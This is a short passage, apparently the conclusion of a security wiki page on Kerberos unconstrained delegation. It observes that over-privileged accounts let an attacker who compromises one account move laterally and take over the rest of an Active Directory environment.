Hope you notice how unconstrained delegation becomes a risk to an environment when the environment is not configured properly. What I mean with this is, even when the delegation is done right, if an account is given more rights than what it should have and that account gets compromised, you can move laterally by compromising another account with more privileges, compromising the rest of the environment.

PreviousPit NextSearch

Last updated 3 years ago

Was this helpful?